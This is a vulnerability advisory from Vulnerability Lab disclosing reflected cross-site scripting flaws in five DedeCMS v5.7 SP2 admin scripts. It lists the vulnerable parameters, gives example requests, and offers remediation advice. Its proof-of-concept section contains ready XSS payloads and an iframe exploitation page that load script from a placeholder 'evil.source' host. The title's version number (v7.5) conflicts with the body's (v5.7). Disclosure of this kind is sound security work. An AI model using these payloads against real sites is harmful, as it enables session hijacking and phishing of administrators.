Document Title:
===============
DedeCMS v7.5 SP2 - Multiple Cross Site Scripting Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2194


Release Date:
=============
2020-04-08


Vulnerability Laboratory ID (VL-ID):
====================================
2194


Common Vulnerability Scoring System:
====================================
4.1


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Welcome to use the most professional PHP website content management
system in China-Zhimeng content management system,
he will be your first choice for easy website building. Adopt XML name
space style core templates: all templates are
saved in file form, which provides great convenience for users to design
templates and website upgrade transfers.
The robust template tags provide strong support for webmasters to DIY
their own websites. High-efficiency tag caching
mechanism: Allows the caching of similar tags. When generating HTML, it
helps to improve the reaction speed of the
system and reduce the resources consumed by the system.

(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
non-persistent cross site vulnerabilities in
the official DedeCMS v5.7 SP2 (UTF8) web-application.


Affected Product(s):
====================
DesDev Inc.
Product: DedeCMS - Content Management System  v5.7 SP2


Vulnerability Disclosure Timeline:
==================================
2020-04-08: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple non-persistent cross site scripting vulnerabilities has been
discovered in the official DedeCMS v5.7 SP2 UTF8  web-application.
The vulnerability allows remote attackers to inject
own malicious script codes with non-persistent attack vector to
compromise browser to web-application requests from the client-side.

The cross site scripting web security vulnerabilities are located in the
`filename`, `mid`, `userid`, `templet` parameters of the  `tpl.php`,
`mychannel_edit.php`, `file_manage_view.php`, `sys_admin_user_edit.php`,
`makehtml_homepage.php` files.  The request method to inject
the malicious script code is GET and the attack vector of the
vulnerability is non-persistent on client-side.

Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack vector of
the vulnerability is non-persistent and the request method to
inject/execute is GET. The vulnerabilities are classic client-side cross
site
scripting vulnerabilities. Successful exploitation of the vulnerability
results in session hijacking, non-persistent phishing attacks,
non-persistent external redirects to malicious source and non-persistent
manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] tpl.php
[+] mychannel_edit.php
[+] file_manage_view.php
[+] sys_admin_user_edit.php
[+] makehtml_homepage.php

Vulnerable Parameter(s):
[+] filename
[+] mid
[+] userid
[+] templet


Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers without
privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Request: Examples
https://test23.localhost:8080/dede/tpl.php?acdir=default&action=edit&filename=data.html
https://test23.localhost:8080/dede/mychannel_edit.php?mid=1&dopost=modifysearch
https://test23.localhost:8080/dede/file_manage_view.php?fmdo=edit&filename=data.html&activepath=
https://test23.localhost:8080/dede/sys_admin_user_edit.php?id=1&userid=23&dopost=delete
https://test23.localhost:8080/dede/makehtml_homepage.php?dopost=view&templet=13


PoC: Payload
>">%20<iframe src=evil.source/file.js onload=alert(x)>
>">%20<img src=evil.source/file.js onload=alert(x)>


PoC: Exploitation
<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title>
<iframe
src="https://test23.localhost:8080/dede/tpl.php?acdir=default&action=edit&filename=>">%20<iframe
src=evil.source onload=alert(x)>%20">
<iframe
src="https://test23.localhost:8080/dede/mychannel_edit.php?mid=>">%20<iframe
src=evil.source onload=alert(x)>&dopost=modifysearch">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=edit&filename=>">%20<iframe
src=evil.source onload=alert(x)>&activepath=">
<iframe
src="https://test23.localhost:8080/dede/sys_admin_user_edit.php?id=1&userid="><iframe
src=evil.source onload=alert(document.domain)>&dopost=delete">
<iframe
src="https://test23.localhost:8080/dede/makehtml_homepage.php?dopost=view&templet=>">%20<iframe
src=evil.source onload=alert(x)>%20">
...


Reference(s):
https://test23.localhost:8080/dede/tpl.php
https://test23.localhost:8080/dede/mychannel_edit.php
https://test23.localhost:8080/dede/file_manage_view.php
https://test23.localhost:8080/dede/sys_admin_user_edit.php
https://test23.localhost:8080/dede/makehtml_homepage.php


Solution - Fix & Patch:
=======================
1. Parse the content to disallow html / js and special chars
2. Restrict the vulnerable paramter input to prevent injects via get
method request
3. Secure the output location were the content is insecure sanitized
delivered as output


Security Risk:
==============
The security risk of the client-side non-persistent cross site scripting
web vulnerabilities in the different modules are estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™


-- 
Company Name: Vulnerability Laboratory (Vulnerability Lab)
Address: Ludwig-Erhard Straße 4 - 34131 Kassel (Germany)
Representative: Geschäftsführer & Administrator

Phone: +49(0)561-40085396
Fax:  +49(0)561-81024871
PGP:
https://www.vulnerability-lab.com/keys%2Fadmin%40vulnerability-lab.com(0x198E9928).txt
Domain: www.vulnerability-lab.com